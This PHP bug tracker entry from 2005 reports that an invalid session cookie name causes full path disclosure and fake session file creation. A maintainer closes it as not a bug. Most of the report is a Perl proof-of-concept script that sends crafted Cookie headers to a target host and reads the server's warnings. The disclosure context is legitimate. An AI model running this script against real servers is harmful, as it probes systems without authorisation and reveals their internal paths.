ID: 35429 Updated by: [EMAIL PROTECTED] Reported By: sienicki dot kamil at gmail dot com -Status: Open +Status: Bogus Bug Type: Unknown/Other Function Operating System: Linux/Windows (all?) PHP Version: 4.4.1 New Comment:
Yeah, you can see full path to the script in 99.99999% of error messages. No bug here. Previous Comments: ------------------------------------------------------------------------ [2005-11-27 23:46:32] sienicki dot kamil at gmail dot com I think it is a small bug when i send '@' as a cookie name session and php show full path to script.. when display errors is on ------------------------------------------------------------------------ [2005-11-27 21:29:22] [EMAIL PROTECTED] What exactly are you trying to exploit? ------------------------------------------------------------------------ [2005-11-27 21:22:21] sienicki dot kamil at gmail dot com Description: ------------ I write simple exploit to show this vuln.. (i think..) problem with sessions.. -- #!/usr/bin/perl # # PHP vulnerabilities.. # # Exploit (Proof Of Concept ?) by Kamil 'K3' Sienicki # # I found two possibility of use that bug.. (maybe more) # # display_errors must be On # use IO::Socket; if(@ARGV < 3) { print "\n"; print "PHP Exploit (POC)\n"; print " by Kamil 'K3' Sienicki\n\n"; print "1. Create fake session file (sess_fake) in directory (default /tmp). \n"; print "2. Full path disclosure.\n\n"; print "Usage: ./php_bug.pl [host] [address] [type of attack (1 or 2)]\n\n"; exit; } $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "80" ) || die "[-] Connect failed! \r\n"; if($ARGV[2] == 1) { print "\n"; print "PHP Exploit (POC)\n"; print " by Kamil 'K3' Sienicki\n\n"; print "Name of session (default PHPSESSID): "; $sess = <stdin>; print "Name of fake sess_file: "; $fake = <stdin>; chomp($sess,$fake); print $socket "GET $ARGV[1] HTTP/1.0\n"; print $socket "Cookie: $sess=$fake\n\n"; print "'$fake' fake file was created.. \n"; } elsif ($ARGV[2] == 2) { print "\n"; print "PHP Exploit (POC)\n"; print " by Kamil 'K3' Sienicki\n\n"; print "Name of session (default PHPSESSID): "; $sess = <stdin>; chomp($sess); print $socket "GET $ARGV[1] HTTP/1.0\n"; print $socket "Cookie: [EMAIL PROTECTED]"; while ($answer = <$socket>) { if ($answer =~ m/^...Warning/) { print $answer."\n"; } } } -- Reproduce code: --------------- <? session_start(); ?> Expected result: ---------------- Warning: session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /htdocs/sess.php on line 3 Warning: Unknown(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in Unknown on line 0 Warning: Unknown(): Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in Unknown on line 0 Full path disclosure.. ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=35429&edit=1